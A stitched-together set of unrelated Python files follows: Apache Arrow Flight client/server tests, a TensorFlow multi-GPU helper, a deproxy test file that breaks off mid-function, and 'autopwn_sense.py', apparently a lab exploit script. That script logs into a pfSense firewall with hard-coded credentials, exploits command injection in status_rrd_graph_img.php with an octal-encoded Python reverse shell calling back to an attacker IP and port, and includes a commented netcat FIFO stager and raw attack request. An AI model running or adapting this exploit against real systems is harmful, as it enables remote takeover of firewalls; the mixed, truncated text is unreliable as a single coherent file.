def test_do_get_ints_pandas():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_pandas()
assert list(data['some_ints']) == table.column(0).to_pylist()
def test_flight_do_get_dicts():
table = simple_dicts_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'dicts')).read_all()
assert data.equals(table)
def test_flight_do_get_ticket():
"""Make sure Tickets get passed to the server."""
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
with CheckTicketFlightServer(expected_ticket=b'the-ticket') as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'the-ticket')).read_all()
assert data.equals(table)
def test_flight_get_info():
"""Make sure FlightEndpoint accepts string and object URIs."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_flight_info(flight.FlightDescriptor.for_command(b''))
assert info.total_records == -1
assert info.total_bytes == -1
assert info.schema == pa.schema([('a', pa.int32())])
assert len(info.endpoints) == 2
assert len(info.endpoints[0].locations) == 1
assert info.endpoints[0].locations[0] == flight.Location('grpc://test')
assert info.endpoints[1].locations[0] == \
flight.Location.for_grpc_tcp('localhost', 5005)
def test_flight_get_schema():
"""Make sure GetSchema returns correct schema."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_schema(flight.FlightDescriptor.for_command(b''))
assert info.schema == pa.schema([('a', pa.int32())])
def test_list_actions():
"""Make sure the return type of ListActions is validated."""
# ARROW-6392
with ListActionsErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(pa.ArrowException, match=".*unknown error.*"):
list(client.list_actions())
with ListActionsFlightServer() as server:
client = FlightClient(('localhost', server.port))
assert list(client.list_actions()) == \
ListActionsFlightServer.expected_actions()
def test_get_port():
"""Make sure port() works."""
server = GetInfoFlightServer("grpc://localhost:0")
try:
assert server.port > 0
finally:
server.shutdown()
@pytest.mark.skipif(os.name == 'nt',
reason="Unix sockets can't be tested on Windows")
def test_flight_domain_socket():
"""Try a simple do_get call over a Unix domain socket."""
with tempfile.NamedTemporaryFile() as sock:
sock.close()
location = flight.Location.for_grpc_unix(sock.name)
with ConstantFlightServer(location=location):
client = FlightClient(location)
reader = client.do_get(flight.Ticket(b'ints'))
table = simple_ints_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
reader = client.do_get(flight.Ticket(b'dicts'))
table = simple_dicts_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with EchoFlightServer(expected_schema=data.schema) as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_generator_stream():
"""Try downloading a flight of RecordBatches in a GeneratorStream."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=['a'])
with EchoStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
writer.write_table(data)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_invalid_generator_stream():
"""Try streaming data with mismatched schemas."""
with InvalidStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(pa.ArrowException):
client.do_get(flight.Ticket(b'')).read_all()
def test_timeout_fires():
"""Make sure timeouts fire on slow requests."""
# Do this in a separate thread so that if it fails, we don't hang
# the entire test process
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("", b"")
options = flight.FlightCallOptions(timeout=0.2)
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightTimedOutError):
list(client.do_action(action, options=options))
def test_timeout_passes():
"""Make sure timeouts do not fire on fast requests."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
options = flight.FlightCallOptions(timeout=5.0)
client.do_get(flight.Ticket(b'ints'), options=options).read_all()
basic_auth_handler = HttpBasicServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
token_auth_handler = TokenServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
@pytest.mark.slow
def test_http_basic_unauth():
"""Test that auth fails when not authenticated."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*unauthenticated.*"):
list(client.do_action(action))
def test_http_basic_auth():
"""Test a Python implementation of HTTP basic authentication."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_http_basic_auth_invalid_password():
"""Test that auth fails with the wrong password."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*wrong password.*"):
client.authenticate(HttpBasicClientAuthHandler('test', 'wrong'))
next(client.do_action(action))
def test_token_auth():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_token_auth_invalid():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightUnauthenticatedError):
client.authenticate(TokenClientAuthHandler('test', 'wrong'))
def test_location_invalid():
"""Test constructing invalid URIs."""
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
flight.connect("%")
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
ConstantFlightServer("%")
def test_location_unknown_scheme():
"""Test creating locations for unknown schemes."""
assert flight.Location("s3://foo").uri == b"s3://foo"
assert flight.Location("https://example.com/bar.parquet").uri == \
b"https://example.com/bar.parquet"
@pytest.mark.slow
@pytest.mark.requires_testing_data
def test_tls_fails():
"""Make sure clients cannot connect when cert verification fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Ensure client doesn't connect when certificate verification
# fails (this is a slow test since gRPC does retry a few times)
client = FlightClient("grpc+tls://localhost:" + str(s.port))
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.requires_testing_data
def test_tls_do_get():
"""Try a simple do_get call over TLS."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = FlightClient(('localhost', s.port),
tls_root_certs=certs["root_cert"])
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_override_hostname():
"""Check that incorrectly overriding the hostname fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
override_hostname="fakehostname")
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
def test_flight_do_get_metadata():
"""Try a simple do_get call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
batches = []
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
idx = 0
while True:
try:
batch, metadata = reader.read_chunk()
batches.append(batch)
server_idx, = struct.unpack('<i', metadata.to_pybytes())
assert idx == server_idx
idx += 1
except StopIteration:
break
data = pa.Table.from_batches(batches)
assert data.equals(table)
def test_flight_do_put_metadata():
"""Try a simple do_put call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
with writer:
for idx, batch in enumerate(table.to_batches(max_chunksize=1)):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
buf = metadata_reader.read()
assert buf is not None
server_idx, = struct.unpack('<i', buf.to_pybytes())
assert idx == server_idx
@pytest.mark.slow
def test_cancel_do_get():
"""Test canceling a DoGet operation on the client side."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
reader.cancel()
with pytest.raises(flight.FlightCancelledError, match=".*Cancel.*"):
reader.read_chunk()
@pytest.mark.slow
def test_cancel_do_get_threaded():
"""Test canceling a DoGet operation from another thread."""
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
read_first_message = threading.Event()
stream_canceled = threading.Event()
result_lock = threading.Lock()
raised_proper_exception = threading.Event()
def block_read():
reader.read_chunk()
read_first_message.set()
stream_canceled.wait(timeout=5)
try:
reader.read_chunk()
except flight.FlightCancelledError:
with result_lock:
raised_proper_exception.set()
thread = threading.Thread(target=block_read, daemon=True)
thread.start()
read_first_message.wait(timeout=5)
reader.cancel()
stream_canceled.set()
thread.join(timeout=1)
with result_lock:
assert raised_proper_exception.is_set()
def test_roundtrip_types():
"""Make sure serializable types round-trip."""
ticket = flight.Ticket("foo")
assert ticket == flight.Ticket.deserialize(ticket.serialize())
desc = flight.FlightDescriptor.for_command("test")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
desc = flight.FlightDescriptor.for_path("a", "b", "test.arrow")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
info = flight.FlightInfo(
pa.schema([('a', pa.int32())]),
desc,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
info2 = flight.FlightInfo.deserialize(info.serialize())
assert info.schema == info2.schema
assert info.descriptor == info2.descriptor
assert info.total_bytes == info2.total_bytes
assert info.total_records == info2.total_records
assert info.endpoints == info2.endpoints
def test_roundtrip_errors():
"""Ensure that Flight errors propagate from server to client."""
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.do_action(flight.Action("internal", b"")))
with pytest.raises(flight.FlightTimedOutError, match=".*foo.*"):
list(client.do_action(flight.Action("timedout", b"")))
with pytest.raises(flight.FlightCancelledError, match=".*foo.*"):
list(client.do_action(flight.Action("cancel", b"")))
with pytest.raises(flight.FlightUnauthenticatedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthenticated", b"")))
with pytest.raises(flight.FlightUnauthorizedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthorized", b"")))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.list_flights())
def test_do_put_independent_read_write():
"""Ensure that separate threads can read/write on a DoPut."""
# ARROW-6063: previously this would cause gRPC to abort when the
# writer was closed (due to simultaneous reads), or would hang
# forever.
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
count = [0]
def _reader_thread():
while metadata_reader.read() is not None:
count[0] += 1
thread = threading.Thread(target=_reader_thread)
thread.start()
batches = table.to_batches(max_chunksize=1)
with writer:
for idx, batch in enumerate(batches):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
# Causes the server to stop writing and end the call
writer.done_writing()
# Thus reader thread will break out of loop
thread.join()
# writer.close() won't segfault since reader thread has
# stopped
assert count[0] == len(batches)
def test_server_middleware_same_thread():
"""Ensure that server middleware run on the same thread as the RPC."""
with HeaderFlightServer(middleware={
"test": HeaderServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
results = list(client.do_action(flight.Action(b"test", b"")))
assert len(results) == 1
value = results[0].body.to_pybytes()
assert b"right value" == value
def test_middleware_reject():
"""Test rejecting an RPC with server middleware."""
with HeaderFlightServer(middleware={
"test": SelectiveAuthServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
# The middleware allows this through without auth.
with pytest.raises(pa.ArrowNotImplementedError):
list(client.list_actions())
# But not anything else.
with pytest.raises(flight.FlightUnauthenticatedError):
list(client.do_action(flight.Action(b"", b"")))
client = FlightClient(
('localhost', server.port),
middleware=[SelectiveAuthClientMiddlewareFactory()]
)
response = next(client.do_action(flight.Action(b"", b"")))
assert b"password" == response.body.to_pybytes()
|
multi_gpu.py
|
import multiprocessing as mp
import traceback
from contextlib import contextmanager
import six
import tensorflow as tf
from tfsnippet.utils import (is_tensor_object,
is_tensorflow_version_higher_or_equal)
from .misc import cached
__all__ = ['detect_gpus', 'average_gradients', 'MultiGPU']
@cached
def detect_gpus():
"""
Detect the GPU devices and their interconnection on current machine.
Returns:
list[list[str]]: List of GPU groups, each group is a list of
GPU device names. The GPUs in one group are interconnected.
"""
def worker(q):
# `device_lib` will not release the memory it took,
# so we run it in a sub-process.
try:
from tensorflow.python.client import device_lib
if is_tensorflow_version_higher_or_equal('1.8.0'):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
devices = list(device_lib.list_local_devices(config))
else:
devices = list(device_lib.list_local_devices())
gpus = [
(device.name, device)
for device in devices
if device.device_type == 'GPU'
]
union_set = {i: i for i in range(len(gpus))}
for i, (name, device) in enumerate(gpus):
assert (device.name == '/device:GPU:{}'.format(i))
for link in device.locality.links.link:
if link.device_id != i:
union_set[i] = union_set[link.device_id]
for i in six.iterkeys(union_set):
while union_set[i] != union_set[union_set[i]]:
union_set[i] = union_set[union_set[i]]
root_devices = sorted(set(union_set.values()))
gpu_groups = [[] for _ in range(len(root_devices))]
dev_to_group = {j: i for i, j in enumerate(root_devices)}
for i, (name, device) in enumerate(gpus):
gpu_groups[dev_to_group[union_set[i]]].append(name)
q.put((1, gpu_groups))
except Exception:
q.put((0, traceback.format_exc()))
q = mp.Queue()
p = mp.Process(target=worker, args=(q,))
try:
p.start()
result = q.get()
if result[0] == 1:
return result[1]
else:
raise RuntimeError(
'Failed to retrieve GPU information, the traceback of '
'sub-process is:\n {}'.
format('\n '.join(result[1].split('\n')))
)
finally:
p.terminate()
p.join()
def average_gradients(tower_grads):
"""
Calculate the average gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Source:
https://github.com/tensorflow/models/blob/master/tutorials/image/
cifar10/cifar10_multi_gpu_train.py
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer
list is over individual gradients. The inner list is over the
gradient calculation for each tower.
Returns:
List of pairs of (gradient, variable) where the gradient has been
averaged across all towers.
"""
if len(tower_grads) == 1:
return tower_grads[0]
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
expanded_g = tf.expand_dims(g, 0)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
class MultiGPU(object):
"""
Class to help build data-paralleled outputs and training operations.
"""
def __init__(self, disable_prebuild=False):
"""
Construct a :class:`MultiGPU`.
Args:
disable_prebuild: Whether or not to disable pre-build on CPU?
Some operations (e.g., NCHW convolutional kernels) may not be
supported by CPUs for the time being, thus the pre-building on
CPUs might need to be disabled.
"""
gpu_groups = detect_gpus()
if not gpu_groups:
self._main_device = '/device:CPU:0'
elif len(gpu_groups) != 1 and not disable_prebuild:
self._main_device = '/device:CPU:0'
else:
self._main_device = gpu_groups[0][0]
self._disable_prebuild = disable_prebuild
self._gpu_devices = tuple(sum(gpu_groups, []))
self._work_devices = self._gpu_devices \
if self._gpu_devices else [self._main_device]
@property
def disable_prebuild(self):
"""Whether or not to disable pre-build on CPU?"""
return self._disable_prebuild
@property
def main_device(self):
"""
Get the main device name.
Main device is the device for storing variables, and for gathering
losses / gradients during training. It may not be necessary one
of the `work_devices`. Do not run the model computation graph on the
`main_device`, otherwise the `channels_last` parameter for convolutional
layers might result in undesired behaviors.
"""
return self._main_device
@property
def work_devices(self):
"""
Get the names of the working devices.
The model computation graph should be run only on these devices.
Do not run them on the `main_device`, otherwise the `channels_last`
parameter for convolutional layers might result in undesired behaviors.
"""
return self._work_devices
@property
def gpu_devices(self):
"""Get the names of GPU devices."""
return self._gpu_devices
def is_gpu_device(self, device):
"""Check whether or not `device` is a GPU device."""
return device in self._gpu_devices
def channels_last(self, device):
"""
Get the `channels_last` argument for `device`.
It will be :obj:`True` for non-GPU devices, :obj:`False` for GPUs.
Be careful if you want to build a model on both CPU and GPU devices,
with ``channels_last = multi_gpu.channels_last(device)``.
The convolutional layers will work as desired, but the dense layers
after or before a convolutional layer will not work properly, unless
special treatment is taken.
"""
return device not in self._gpu_devices
def data_parallel(self, batch_size, inputs):
"""
Iterate through all devices and build the data-paralleled model.
Args:
batch_size (int or tf.Tensor): The size of each mini-batch.
inputs (Iterable[tf.Tensor]): Input placeholders to be sliced
for data parallelism. The input placeholders will be sliced
through the first dimension.
Yields:
str, bool, tuple[tf.Tensor]: ``(dev, pre_build, inputs)``,
the device name, a flag indicating whether this is a
pre-building pass for creating variables on CPU, and the
tuple of sliced input placeholders.
"""
inputs = list(inputs)
# quick path: only one device, do not slice
if len(self.work_devices) == 1:
assert(self.main_device == self.work_devices[0])
yield self.main_device, False, tuple(inputs)
# slow path: multi-GPUs
else:
# the GPUs are not in the same group, place variables on CPU
if self.main_device not in self.work_devices:
yield self.main_device, True, tuple(inputs)
# build the paralleled computation graph for each device
with tf.name_scope('data_parallel') as ns:
pass # generate a name scope to place our data slicing ops
k = len(self.work_devices)
for i, device in enumerate(self.work_devices):
dev_inputs = []
with tf.name_scope(ns + 'tower_gpu_{}'.format(i)):
for inp in inputs:
slice_len = (batch_size + k - 1) // k
low, high = slice_len * i, slice_len * (i + 1)
dev_inputs.append(inp[low: high])
yield device, False, tuple(dev_inputs)
@contextmanager
def maybe_name_scope(self, device):
"""
Generate a name scope if `device` is not `main_device`.
Args:
device (str): The name of the device.
Yields
The generated name scope, or None.
"""
if device == self.main_device:
yield
elif device not in self._gpu_devices:
with tf.name_scope('tower_cpu') as ns:
yield ns
else:
gpu_id = self._gpu_devices.index(device)
with tf.name_scope('tower_gpu_{}'.format(gpu_id)) as ns:
yield ns
def average_grads(self, grads):
"""
Take the averaged gradients on the main device.
Args:
grads: List of lists of (gradients, variables) pairs.
Returns:
List of pairs of (gradient, variable) where the gradient has been
averaged across all devices.
"""
# quick path: only one device, just return the grads
if len(grads) == 1:
return grads[0]
# slow path: multi-GPUs
else:
with tf.device(self.main_device), tf.name_scope('average_grads'):
return average_gradients(grads)
def apply_grads(self, grads, optimizer, global_step=None,
control_inputs=None):
"""
Apply the gradients.
Args:
grads: List of (gradients, variables) pairs.
optimizer: The TensorFlow optimizer.
global_step: The optional global step counter.
control_inputs: Dependency operations before applying the gradients.
Returns:
The operation of applying gradients.
"""
def mk_op():
return optimizer.apply_gradients(grads, global_step=global_step)
with tf.device(self.main_device), tf.name_scope('apply_grads'):
if control_inputs:
with tf.control_dependencies(control_inputs):
return mk_op()
else:
return mk_op()
def average(self, tensors, batch_size=None):
"""
Take the average of given tensors from different devices.
If `batch_size` is specified, the tensors will be averaged with respect
to the size of data fed to each device.
Args:
tensors (list[list[tf.Tensor]]): List of tensors from each device.
batch_size (None or int or tf.Tensor): The optional batch size.
Returns:
list[tf.Tensor]: The averaged tensors.
"""
# check the arguments and try the fast path: only one tensor
tensors = list(tensors)
if not tensors:
return []
length = len(tensors[0])
if length == 0:
raise ValueError('`tensors` must be list of non-empty Tensor '
'lists.')
for t in tensors[1:]:
if len(t) != length:
raise ValueError('`tensors` must be list of Tensor lists of '
'the same length.')
if length == 1:
return [t[0] for t in tensors]
# do the slow path: average all tensors
with tf.device(self.main_device), tf.name_scope('average_tensors'):
if batch_size is None:
return [tf.reduce_mean(tf.stack(t), axis=0) for t in tensors]
k = len(self.work_devices)
slice_len = (batch_size + k - 1) // k
last_slice_size = batch_size - (k - 1) * slice_len
if is_tensor_object(batch_size):
to_float = tf.to_float
else:
to_float = float
float_batch_size = to_float(batch_size)
weights = tf.stack(
[to_float(slice_len) / float_batch_size] * (k - 1) +
[to_float(last_slice_size) / float_batch_size]
)
return [tf.reduce_sum(tf.stack(t) * weights, axis=0)
for t in tensors]
def concat(self, tensors):
"""
Concat given tensors from different devices.
Args:
tensors (list[list[tf.Tensor]]): List of tensors from each device.
Returns:
list[tf.Tensor]: The concatenated tensors.
"""
# check the arguments and try the fast path: only one tensor
tensors = list(tensors)
if not tensors:
return []
length = len(tensors[0])
if length == 0:
raise ValueError('`tensors` must be list of non-empty Tensor '
'lists.')
for t in tensors[1:]:
if len(t) != length:
raise ValueError('`tensors` must be list of Tensor lists of '
'the same length.')
if length == 1:
return [t[0] for t in tensors]
# do the slow path: concat all tensors
with tf.device(self.main_device), tf.name_scope('average_tensors'):
return [tf.concat(t, axis=0) for t in tensors]
|
autopwn_sense.py
|
#!/usr/bin/env python2
# Author: Alamot (Antonios Tsolis)
import re
import sys
import time
from pwn import *
import signal, thread
import requests, urllib3
signal.signal(signal.SIGINT, signal.SIG_DFL)
DEBUG = False
RHOST="10.10.10.60"
RPORT=443
LHOST="10.10.14.5"
LPORT=60001
if DEBUG:
context.log_level = 'debug'
else:
context.log_level = 'info'
def send_ptyshell_payload():
#stager = "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc " + str(LHOST) + " " + str(LPORT) + " > /tmp/f"
stager = "python -c \"import os, pty, socket; lhost = '"+ str(LHOST) + "'; lport = " + str(LPORT) + "; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv('HISTFILE','/dev/null'); pty.spawn('/bin/sh'); s.close(); exit()\""
encoded_stager = ""
for c in stager:
encoded_stager += "\\\\%03d" %(int(oct(ord(c))))
time.sleep(1)
client = None
try:
urllib3.disable_warnings()
client = requests.session()
client.verify = False
client.keep_alive = False
# Retrieve the CSRF token first
p1=log.progress("Connecting to get csrf token")
response = client.get("https://"+str(RHOST)+":"+str(RPORT), timeout=20)
if response.status_code != 200:
p1.failure("Status "+str(response.status_code))
sys.exit()
csrf = re.search('csrfMagicToken\s*=\s*"(sid:\w+,\d+)', response.text).group(1)
p1.success("csrfMagicToken = " + csrf)
# Login
p2=log.progress("Logging in")
data={"__csrf_magic":csrf, "usernamefld":"rohit", "passwordfld":"pfsense", "login":"Login"}
response = client.post("https://"+str(RHOST)+":"+str(RPORT)+"/index.php", data=data, timeout=20)
if response.status_code != 200:
p1.failure("Status "+str(response.status_code))
sys.exit()
p2.success("Status "+str(response.status_code))
# Send payload
p3=log.progress("Sending pty shell payload...")
try:
params={"database":"-throughput.rrd", "graph":"file|printf "+encoded_stager+"|sh|echo "}
response = client.get("https://"+str(RHOST)+":"+str(RPORT)+"/status_rrd_graph_img.php", params=params, timeout=20)
if response.status_code != 200:
p3.failure("Status "+str(response.status_code))
sys.exit()
except requests.exceptions.Timeout as e:
p3.success("OK")
except requests.exceptions.RequestException as e:
log.failure(str(e))
finally:
if client:
client.close()
log.success("Web thread exited successfully.")
try:
threading.Thread(target=send_ptyshell_payload).start()
except Exception as e:
log.error(str(e))
ptyshell = listen(LPORT, timeout=20).wait_for_connection()
if ptyshell.sock is None:
log.failure("Connection timeout.")
sys.exit()
ptyshell.interactive()
sys.exit()
'''
https://10.0.0.145/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
https://10.0.0.145/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20
GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\156\\143\\040\\061\\060\\056\\061\\060\\056\\061\\064\\056\\061\\066\\060\\040\\066\\060\\060\\060\\060\\040\\074\\040\\057\\150\\157\\155\\145\\057\\162\\157\\150\\151\\164\\057\\165\\163\\145\\162\\056\\164\\170\\164
|sh|echo%20 HTTP/1.1
Host: 10.0.0.145
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Cookie: PHPSESSID=28530634f9c99cd400bd73b28b812482
Connection: close
'''
|
test_deproxy.py
|
#!/usr/bin/python
import deproxy
import unittest
import threading
import logging
import socket
import argparse
import time
from unittest import skip
deproxy_port_base = 9999
deproxy_port_iter = None
def get_next_deproxy_port():
global deproxy_port_iter
if deproxy_port_iter is None:
def deproxy_port_iter_func():
for i in xrange(deproxy_port_base):
yield deproxy_port_base - i
deproxy_port_iter = deproxy_port_iter_func().next
return deproxy_port_iter()
class TestDefaultHandler(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_default_handler(self):
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port)
self.assertEquals(int(mc.received_response.code), 200)
class TestEchoHandler(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_echo_handler(self):
methods = ["GET", "PUT", "POST", "DELETE", "HEAD", "OPTIONS", "PATCH"]
headers = {'x-header': '12345'}
for method in methods:
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port, headers=headers,
request_body='this is the body',
default_handler=deproxy.echo_handler,
method=method)
self.assertEquals(int(mc.received_response.code), 200)
self.assertIn('x-header', mc.received_response.headers)
self.assertEquals(mc.received_response.headers['x-header'], '12345')
expected_body = "" if method == "HEAD" else 'this is the body'
self.assertEquals(mc.received_response.body, expected_body)
class TestDelayHandler(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_delay_handler(self):
handler = deproxy.delay(3, deproxy.simple_handler)
t1 = time.time()
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=handler)
t2 = time.time()
self.assertEquals(int(mc.received_response.code), 200)
self.assertGreaterEqual(t2 - t1, 3)
self.assertLessEqual(t2 - t1, 3.5)
class TestRoute(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_route(self):
handler = deproxy.route('http', 'httpbin.org', self.deproxy)
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=handler)
self.assertEquals(int(mc.received_response.code), 200)
class TestCustomHandlers(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_custom_handler_function(self):
def custom_handler(request):
return deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore')
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=custom_handler)
self.assertEquals(int(mc.received_response.code), 606)
def handler_method(self, request):
return deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore')
def test_custom_handler_method(self):
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=self.handler_method)
self.assertEquals(int(mc.received_response.code), 606)
class TestEndpointDefaultHandler(unittest.TestCase):
def setUp(self):
self.port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
def test_endpoint_default_handler_function(self):
def custom_handler(request):
return deproxy.Response(code='601', message='Custom', headers={},
body=None)
self.deproxy.add_endpoint(port=self.port,
default_handler=custom_handler)
url = 'http://localhost:{0}/'.format(self.port)
mc = self.deproxy.make_request(url=url)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '601')
self.assertEqual(mc.received_response.code, '601')
def custom_handler_method(self, request):
return deproxy.Response(code='602', message='Custom', headers={},
body=None)
def test_endpoint_default_handler_method(self):
